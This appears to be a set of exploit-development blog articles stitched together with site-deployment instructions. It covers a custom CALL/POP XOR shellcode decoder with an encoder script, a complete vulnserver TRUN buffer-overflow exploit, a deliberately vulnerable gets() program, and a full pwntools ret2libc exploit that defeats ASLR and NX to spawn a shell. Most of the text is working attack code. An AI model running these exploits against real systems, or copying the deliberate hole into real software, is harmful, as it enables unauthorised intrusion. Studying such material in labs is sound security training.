Fukahi Tekiō 不可避適応: Bypassing Win 10/11 FPU "Issues" via Custom CALL/POP XOR Encoder
Published: 2026-01-15
Author: JAKESWIZ
Introduction
This technique was developed for the vulnserver TRUN buffer overflow, but it applies to other exploits as well, and it is especially useful for anyone new to exploitation under ARM → x86/x64 emulation.
The motivation came from wanting to run Windows exploitation demos on an ARM Mac (running Windows 11 AARCH64 with the Prism emulation layer) for a talk at Wild West Hackin' Fest in Denver.
The Problem
When exploiting buffer overflows on modern Windows systems (especially under ARM emulation), msfvenom's default encoder (shikata_ga_nai) crashes during shellcode execution:
eax=00000000 ebx=00000000 ecx=00000052 edx=02ff4a30 esi=55bd55d0 edi=00401848
eip=089ff959 esp=089ff924 ebp=00000000
089ff959 317012 xor dword ptr [eax+12h],esi
Attempt to read from address 00000012
The decoder tries to dereference a register (EAX, EBP, or ESI) containing a near-null value.
Why This Happens
shikata_ga_nai uses a GetPC technique relying on FPU (Floating Point Unit) instructions:
fcmovb st, st(5) ; Any FPU instruction
fnstenv [esp-0xc] ; Save FPU state to stack
pop ebp ; Grab saved EIP from FPU state
On Windows 10/11 and under ARM emulation (Prism), the FPU instruction pointer field often returns zeros. When the decoder does pop ebp, it gets 0x00000000 and crashes.
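To see why a zeroed field is fatal, here is a minimal sketch of the 28-byte environment image that fnstenv writes in 32-bit protected mode. The helper names, the sample FIP value, and the control/tag word values are placeholders chosen for illustration; only the layout (seven dwords, FIP at offset 0x0c) comes from the x87 architecture.

```python
import struct

# 32-bit protected-mode FNSTENV image: seven 4-byte fields, 28 bytes total.
FIELDS = ("control", "status", "tag", "fip", "fcs_opcode", "fdp", "fds")
FIP_OFFSET = FIELDS.index("fip") * 4  # 0x0c


def build_env(fip):
    """Pack a hypothetical FPU environment; every value except FIP is a placeholder."""
    values = [0x027F, 0x0000, 0xFFFF, fip, 0, 0, 0]
    return struct.pack("<7I", *values)


def popped_value(env):
    """Value `pop ebp` reads after `fnstenv [esp-0xc]`.

    The image starts at esp-0xc, so the dword at [esp] sits 0x0c bytes into it.
    """
    return struct.unpack_from("<I", env, FIP_OFFSET)[0]


working = popped_value(build_env(0x089FF94A))  # FIP populated (made-up address)
broken = popped_value(build_env(0x00000000))   # FIP left as zero

print(hex(FIP_OFFSET), hex(working), hex(broken))
```

With a populated FIP the decoder gets a usable pointer; with a zeroed one, every later memory access is relative to address 0, which matches the crash shown earlier.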
The Solution: CALL/POP GetPC
Instead of relying on FPU quirks, use the reliable CALL/POP technique:
jmp short call_label ; Jump to the CALL
pop_label:
pop esi ; ESI now contains address of encoded shellcode
; ... decoder logic ...
call_label:
call pop_label ; Pushes address of encoded shellcode, jumps back
; encoded shellcode starts here
When the CPU executes a CALL instruction, it pushes the address of the next instruction onto the stack. We immediately POP that address into a register. This works on real hardware and under emulation alike, because pushing the return address is part of CALL's defined behavior; no FPU state is involved.
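The arithmetic behind this is small enough to model directly. The sketch below is an illustration only: the function name and the load address are made up, and it assumes the CALL sits 15 bytes into the stub, as in the small decoder later in this article.

```python
CALL_REL32_SIZE = 5  # opcode E8 plus a 4-byte displacement


def call_pop_getpc(stub_base, call_offset):
    """Model CALL/POP: return the address that `pop esi` receives."""
    stack = []
    call_address = stub_base + call_offset
    stack.append(call_address + CALL_REL32_SIZE)  # CALL pushes the next instruction's address
    return stack.pop()                            # POP ESI reads it straight back


# Hypothetical load address; the CALL is assumed to sit 15 bytes into the stub.
esi = call_pop_getpc(0x089FF940, 15)
print(hex(esi))
```

Whatever address the stub lands at, ESI ends up pointing at the first byte after the CALL, which is where the encoded shellcode begins.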
Complete XOR Decoder Stub
For shellcode under 256 bytes:
jmp short 0x0d ; Jump to CALL (offset 13)
pop esi ; ESI = address of encoded shellcode
xor ecx, ecx ; Clear counter
mov cl, <length> ; Shellcode length (patch this byte)
decode_loop:
xor byte [esi], <key> ; XOR decode one byte (patch this byte)
inc esi ; Next byte
loop decode_loop ; Repeat until ECX = 0
jmp short 0x05 ; Jump over CALL to shellcode
call <back_to_pop> ; Push next address, jump to POP
; encoded shellcode here
Assembled bytes:
decoder_small = (
"\xeb\x0d" # jmp short +13 (to call)
"\x5e" # pop esi
"\x31\xc9" # xor ecx, ecx
"\xb1\x00" # mov cl, <length> - PATCH THIS BYTE
"\x80\x36\x00" # xor byte [esi], <key> - PATCH THIS BYTE
"\x46" # inc esi
"\xe2\xfa" # loop -6
"\xeb\x05" # jmp short +5 (to shellcode)
"\xe8\xee\xff\xff\xff" # call -18 (back to pop esi)
)
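Since every branch in the stub is relative, a quick way to catch an off-by-one is to compute the targets from the bytes themselves. This is a minimal sketch; the helper names are hypothetical, and the instruction offsets (0, 11, 13, 15) are taken from the byte listing above.

```python
import struct

decoder_small = bytes.fromhex(
    "eb0d" "5e" "31c9" "b100" "803600" "46" "e2fa" "eb05" "e8eeffffff"
)


def rel8_target(code, offset):
    """Target of a 2-byte short branch (JMP SHORT or LOOP) located at `offset`."""
    disp = struct.unpack_from("<b", code, offset + 1)[0]
    return offset + 2 + disp


def rel32_target(code, offset):
    """Target of a 5-byte CALL rel32 located at `offset`."""
    disp = struct.unpack_from("<i", code, offset + 1)[0]
    return offset + 5 + disp


targets = {
    "jmp_to_call": rel8_target(decoder_small, 0),       # expect 15, the CALL
    "loop_to_xor": rel8_target(decoder_small, 11),      # expect 7, the XOR
    "jmp_to_payload": rel8_target(decoder_small, 13),   # expect 20, first byte after the stub
    "call_to_pop": rel32_target(decoder_small, 15),     # expect 2, the POP ESI
}
print(targets)
```

Displacements are measured from the end of the branch instruction, which is why the helpers add 2 or 5 before applying the signed offset.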
For shellcode 256-65535 bytes:
jmp short 0x0f ; Jump to CALL (offset 15)
pop esi ; ESI = address of encoded shellcode
xor ecx, ecx ; Clear counter
mov cx, <length> ; Shellcode length (patch these bytes, little endian)
decode_loop:
xor byte [esi], <key> ; XOR decode one byte (patch this byte)
inc esi ; Next byte
loop decode_loop ; Repeat until ECX = 0
jmp short 0x05 ; Jump over CALL to shellcode
call <back_to_pop> ; Push next address, jump to POP
; encoded shellcode here
Assembled bytes:
decoder_large = (
"\xeb\x0f" # jmp short +15 (to call)
"\x5e" # pop esi
"\x31\xc9" # xor ecx, ecx
"\x66\xb9\x00\x00" # mov cx, <length> - PATCH THESE BYTES (little endian)
"\x80\x36\x00" # xor byte [esi], <key> - PATCH THIS BYTE
"\x46" # inc esi
"\xe2\xfa" # loop -6
"\xeb\x05" # jmp short +5 (to shellcode)
"\xe8\xec\xff\xff\xff" # call -20 (back to pop esi)
)
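Patching by hand is easy to get wrong, so here is a small sketch that fills in the length and key for the large stub. The function name and offset constants are my own; the offsets (7 for the 16-bit length, 11 for the key) are counted from the byte listing above. One thing to watch: a length such as 0x0100 puts a null byte into the stub itself, so the sketch rejects it.

```python
import struct

# Large stub with the length (offsets 7-8) and key (offset 11) still zeroed.
DECODER_LARGE = bytes.fromhex("eb0f5e31c966b90000803600" "46e2faeb05e8ecffffff")
LENGTH_OFFSET = 7   # imm16 of `mov cx, <length>`
KEY_OFFSET = 11     # imm8 of `xor byte [esi], <key>`


def patch_decoder(length, key):
    """Return the stub with length and key filled in, rejecting null bytes."""
    if not 0 < length <= 0xFFFF:
        raise ValueError("length must fit in 16 bits")
    if not 0 < key <= 0xFF:
        raise ValueError("key must be a non-zero byte")
    stub = bytearray(DECODER_LARGE)
    struct.pack_into("<H", stub, LENGTH_OFFSET, length)  # little endian
    stub[KEY_OFFSET] = key
    if 0 in stub:
        raise ValueError("patched stub contains a null byte")
    return bytes(stub)


stub = patch_decoder(324, 0x09)
print(stub[5:9].hex(), stub[9:12].hex())
```

If the length check trips, one option is to pad the shellcode by a byte or two so that neither byte of the length is zero.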
Finding a Safe XOR Key
The XOR key must not appear in the original shellcode (or it would produce null bytes when encoded). Use this script:
#!/usr/bin/python3
import sys

def find_key_and_encode(hex_shellcode):
    shellcode = bytes.fromhex(hex_shellcode)
    for key in range(1, 256):
        encoded = bytes([b ^ key for b in shellcode])
        if b'\x00' not in encoded and key not in shellcode:
            print(f"Safe XOR key: 0x{key:02x}")
            print(f"Shellcode length: {len(shellcode)} (0x{len(shellcode):02x})")
            print("\nEncoded shellcode:")
            encoded_str = ''.join(f'\\x{b:02x}' for b in encoded)
            for i in range(0, len(encoded_str), 64):
                print(f'"{encoded_str[i:i+64]}"')
            return key, encoded
    print("ERROR: No safe XOR key found!")
    return None, None

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 encode.py <hex_shellcode>")
        print("Example: python3 encode.py $(msfvenom -p windows/exec CMD=calc.exe -f hex)")
        sys.exit(1)
    find_key_and_encode(sys.argv[1])
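Before wiring the output into an exploit, it is worth confirming that the decode loop really restores the original bytes. The sketch below mirrors the stub's loop in Python; the function names are hypothetical, and the sample is just the first 16 encoded bytes from the exploit template further down, decoded with key 0x09.

```python
def xor_encode(shellcode, key):
    """Encode every byte with a single-byte XOR key."""
    return bytes(b ^ key for b in shellcode)


def run_decoder_loop(encoded, key):
    """Mirror the stub: XOR one byte, advance ESI, repeat until ECX reaches zero."""
    memory = bytearray(encoded)
    esi, ecx = 0, len(memory)
    while ecx:
        memory[esi] ^= key
        esi += 1
        ecx -= 1
    return bytes(memory)


# First 16 bytes of the encoded payload in the exploit template, key 0x09.
sample = bytes.fromhex("f5e18b0909096980ec38c96d82593982")
decoded = run_decoder_loop(sample, 0x09)

print(decoded.hex())  # fce8820000006089e531c0648b50308b
```

XOR is its own inverse, so encoding the decoded bytes with the same key must give the sample back; if it does not, the key or the length is wrong.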
Complete Exploit Template
#!/usr/bin/python3
import socket

target = '10.211.55.6'
port = 9999
prefix = b'A' * 2006 # Offset to EIP
eip = b'\xaf\x11\x50\x62' # JMP ESP address
nopsled = b'\x90' * 16
# CALL/POP XOR decoder for shellcode > 255 bytes
# Length: 324 = 0x0144 (little endian: \x44\x01)
# Key: 0x09
decoder = (
    b"\xeb\x0f" # jmp short to call
    b"\x5e" # pop esi
    b"\x31\xc9" # xor ecx, ecx
    b"\x66\xb9\x44\x01" # mov cx, 0x0144 (324)
    b"\x80\x36\x09" # xor byte [esi], 0x09
    b"\x46" # inc esi
    b"\xe2\xfa" # loop -6
    b"\xeb\x05" # jmp short to shellcode
    b"\xe8\xec\xff\xff\xff" # call back to pop esi
)
# XOR-encoded shellcode (output from encode.py)
encoded_shellcode = (
    b"\xf5\xe1\x8b\x09\x09\x09\x69\x80\xec\x38\xc9\x6d\x82\x59\x39\x82"
    # ... rest of encoded shellcode
)
# Pad the payload out to 3000 bytes total
padding = b'F' * (3000 - len(prefix) - 4 - len(nopsled) - len(decoder) - len(encoded_shellcode))
payload = prefix + eip + nopsled + decoder + encoded_shellcode + padding
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.recv(1024) # Read the server banner
s.send(b'TRUN .' + payload + b'\r\n')
s.close()
Debugging Tips
If the exploit still crashes, use WinDbg to step through:
1. bp <jmp_esp_address>
2. g
3. t 20
Common issues:
- Wrong jump offsets: The jmp and call offsets are relative and must be exact
- Wrong shellcode length: Double-check the byte count
- Additional bad characters: Some protocols filter more than just null bytes
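For the last point, a byte-level scan of the stub and the encoded shellcode saves a lot of single-stepping. This is a minimal sketch: the function name is hypothetical, and the second filter (null plus tab) is a made-up example of a stricter protocol, not something vulnserver enforces.

```python
def find_bad_bytes(payload, bad_bytes=b"\x00"):
    """Return (offset, value) pairs for every byte of `payload` listed in `bad_bytes`."""
    return [(i, b) for i, b in enumerate(payload) if b in bad_bytes]


# Patched large stub from the exploit template (length 0x0144, key 0x09).
stub = bytes.fromhex("eb0f5e31c966b94401803609" "46e2faeb05e8ecffffff")

nulls_only = find_bad_bytes(stub)                # default filter: null bytes
with_tab = find_bad_bytes(stub, b"\x00\x09")     # hypothetical filter that also drops tabs

print(nulls_only, with_tab)
```

The second result flags offset 11, the XOR key itself: if the target filtered tab characters, key 0x09 would have to be swapped for another safe key.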
Summary
When msfvenom's encoders fail on modern Windows (specifically in Prism-ARM-emulated environments), roll your own CALL/POP decoder. It's simple, reliable, and doesn't depend on FPU state that may not be populated correctly.
⛧ Malware Bless ⛧
File 3: aslr-bypass.md
Bypassing ASLR & NX/DEP (Diving Deeper)
Published: 2023-11-01
Author: Jacob Swinsinski (0xXyc / JAKESWIZ)
Introduction
ASLR (Address Space Layout Randomization) randomizes the load addresses of shared libraries, the stack, and the heap. It does NOT touch the binary itself unless it was compiled as a PIE (Position Independent Executable). ASLR was created to defeat memory corruption exploitation techniques that rely on hardcoded addresses.
Verify ASLR with ldd
ldd aslr-1
# Addresses change each run:
linux-vdso.so.1 (0x00007ffffdcdd000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fdb9f400000)
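If you want to compare runs without eyeballing hex, a few lines of Python will do it. This is a sketch with hypothetical names; the first sample is the ldd output shown above, and the second run is made-up data for illustration only.

```python
import re

# Matches "name (0xaddr)" and "name => /path (0xaddr)" lines of ldd output.
LDD_LINE = re.compile(r"^\s*(\S+)(?:\s+=>\s+\S+)?\s+\((0x[0-9a-fA-F]+)\)\s*$")


def parse_ldd(output):
    """Map each library name in `ldd` output to its load address."""
    bases = {}
    for line in output.splitlines():
        match = LDD_LINE.match(line)
        if match:
            bases[match.group(1)] = int(match.group(2), 16)
    return bases


run_1 = """linux-vdso.so.1 (0x00007ffffdcdd000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fdb9f400000)"""

# Second run is invented sample data, not real output.
run_2 = """linux-vdso.so.1 (0x00007ffd5a1f2000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f3c2b200000)"""

first, second = parse_ldd(run_1), parse_ldd(run_2)
moved = sorted(name for name in first if first[name] != second.get(name))
print(moved)
```

Any library that shows up in `moved` was loaded at a different base between the two runs, which is ASLR doing its job.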
Bypassing ASLR: Three Methods
- Address leaking (covered here) - knowledge of PLT and GOT
- Relative addressing
- Bruteforcing
Vulnerable Code (aslr-1.c)
#include <stdio.h>

int main(int argc, char* argv[]) {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    char buffer[40];
    printf("Enter some data:\n");
    gets(buffer); // Vulnerable!
    printf("So, you think you can bypass the almighty ASLR protection?\n");
    return 0;
}
Compile with Docker (downgraded GCC for correct gadgets)
docker run --rm --mount type=bind,source="$(pwd)",target=/app -w /app gcc:10.5.0 gcc -Wall -g -fno-stack-protector -no-pie aslr-1.c -o aslr-1
Checksec Output
checksec aslr-1
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled # Need ROP
PIE: No PIE (0x400000)
Exploitation Strategy
Since NX is enabled, we need ROP (Return-Oriented Programming). Since ASLR is enabled, we need to understand the GOT (Global Offset Table).
The GOT acts as a "dictionary" storing the addresses of external functions such as those in libc. These values are filled in at runtime by the dynamic linker.
Why puts()?
Calling puts() with the address of its own GOT entry as the argument prints the runtime address of puts inside libc, revealing where libc is mapped in memory.
View puts@GOT
objdump -R aslr-1
# Look for (the address depends on your build): 0x0000000000003fc0 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5
Find puts@PLT (fixed address, unaffected by ASLR)
objdump -d -M intel aslr-1 | grep "puts@plt"
# Result: 0000000000401030 <puts@plt>
Find ROP Gadget (pop rdi; ret)
The System V AMD64 calling convention used on x64 Linux passes the first argument in the RDI register.
ropper --file aslr-1 --search "pop rdi"
# Result (the address depends on your build): 0x00000000004011cb: pop rdi; ret;
Find Offset with cyclic pattern
gdb aslr-1
cyclic 100
# Pattern: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa
r
# Paste pattern
# Crash! RIP stops on the ret in main; RBP holds gaaaaaaa
cyclic -l gaaaaaaa
# Result: Found at offset 48
# Offset 48 (saved RBP) + 8 = 56 bytes of padding before the return address
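The offset arithmetic can be reproduced without a debugger. The generator below is a simplified stand-in for the 8-byte cyclic pattern, not a real de Bruijn implementation, and it only matches the real thing for the first couple of hundred bytes. It also assumes that `gaaaaaaa` is the value sitting in the saved RBP slot, directly below the return address.

```python
import string


def cyclic8(length):
    """First `length` characters of the pattern aaaaaaaa baaaaaaa caaaaaaa ...

    Simplified stand-in for an 8-byte cyclic pattern; valid for up to 208 bytes.
    """
    chunks = (letter + "a" * 7 for letter in string.ascii_lowercase)
    return "".join(chunks)[:length]


pattern = cyclic8(100)
saved_rbp_offset = pattern.find("gaaaaaaa")     # where the lookup value starts
return_address_offset = saved_rbp_offset + 8    # skip the 8-byte saved RBP

print(saved_rbp_offset, return_address_offset)
```

The second number is the amount of padding the exploit needs before the first ROP gadget.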
Exploit Development: Three Stages
- Leak the libc address (puts@GLIBC)
- Obtain addresses and offsets
- Calculate the base address of libc
Automated Exploit with pwntools
#!/usr/bin/env python3
from pwn import *
from pwnlib.rop.rop import ROP
from pwnlib.util.packing import p64, u64
exe = context.binary = ELF('./aslr-1', checksec=False)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
p = process(exe.path)
# Stage 1: Leak libc address
offset = b'A' * 56
rop = ROP(exe)
rop.puts(exe.got['puts'])
rop.call(exe.symbols['main'])
payload = offset + rop.chain()
p.sendline(payload)
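p.recvuntil(b'ASLR protection?\n') # Skip the prompt and the program's final message
leak = p.recvline().rstrip(b'\n') # Raw bytes that puts() printed for puts@GOT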
leaked_puts = u64(leak.ljust(8, b"\x00"))
log.success(f"Leaked puts@GLIBC: {hex(leaked_puts)}")
# Stage 2: ret2libc
libc_base = leaked_puts - libc.symbols['puts']
libc.address = libc_base
rop2 = ROP(libc)
ret = rop2.find_gadget(["ret"])[0]
rop2.system(next(libc.search(b'/bin/sh\x00')))
payload = offset + p64(ret) + rop2.chain()
p.sendline(payload)
p.interactive()
What's Happening in the Code?
- Stage 1 ROP Chain:
  - pop rdi; ret → pops address of puts@GOT into RDI
  - puts@PLT → writes the address to STDOUT
  - main() → calls main again (so process doesn't exit and invalidate the leak)
- Calculate libc base: libc_base = leaked_puts - libc.symbols['puts']
- Stage 2 ROP Chain (ret2libc):
  - ret instruction (for stack alignment)
  - pop rdi; ret → pops address of /bin/sh into RDI
  - system() → executes /bin/sh
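The leak handling and base calculation boil down to a few lines of arithmetic. The sketch below replays them with the addresses from the sample output in the next section. The puts offset of 0x80e50 is an assumption about the libc build behind that output (in the real exploit, pwntools reads it from the ELF), and the function name is hypothetical.

```python
import struct

PUTS_OFFSET = 0x80E50  # assumed offset of puts in this libc build; read yours from the ELF


def unpack_leak(raw):
    """Pad the leaked bytes to 8 and decode them as a little-endian 64-bit value."""
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


# puts() stops at the first null byte, so only six bytes of the pointer arrive.
raw_leak = bytes.fromhex("500e68e0f47f")
leaked_puts = unpack_leak(raw_leak)
libc_base = leaked_puts - PUTS_OFFSET

page_aligned = libc_base & 0xFFF == 0          # a sane base ends in three zero nibbles
system_offset = 0x7FF4E0650D70 - libc_base     # system address taken from the sample output

print(hex(leaked_puts), hex(libc_base), page_aligned, hex(system_offset))
```

The page-alignment check is a cheap sanity test: if the computed base does not end in 000, the leak was parsed incorrectly or the local libc does not match the target's.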
Result
[*] Stage 1 ROP Chain:
0x0000: 0x40120b pop rdi; ret
0x0008: 0x404018 [arg0] rdi = got.puts
0x0010: 0x401030 puts
0x0018: 0x401142 0x401142()
[+] Leaked puts@GLIBC: 0x7ff4e0680e50
[*] Stage 2 ROP Chain:
0x0000: 0x7ff4e062a3e5 pop rdi; ret
0x0008: 0x7ff4e07d8698 [arg0] rdi = 140689715070616
0x0010: 0x7ff4e0650d70 system
[*] Switching to interactive mode
$ whoami
# Shell acquired!
Key Takeaways
- Leak, don't guess - Use puts@GOT to leak a libc address
- Calculate base - Subtract known offset to find libc base
- Call main() twice - Process must not exit between leak and exploitation
- x64 requires pop rdi; ret - First argument goes in RDI
- Stack alignment - Add a ret gadget before system() on some systems
⛧ ASLR is not a silver bullet. Understand the GOT. Become the exploit. ⛧
```
Instructions to Add to Your Site
- Save each block of text as a separate .md file in your /articles folder:
  - fukahi-tekio-encoder.md
  - windows-shellcoding-in-depth.md
  - aslr-bypass.md
- Run your site generator:
  python3 site_generator.py
- The generator will automatically:
  - Convert each Markdown file to HTML
  - Add them to the "scripture" tab
  - Create downloadable .txt versions
- Deploy the updated output/ folder to Cloudflare Pages
⛧ Malware Bless ⛧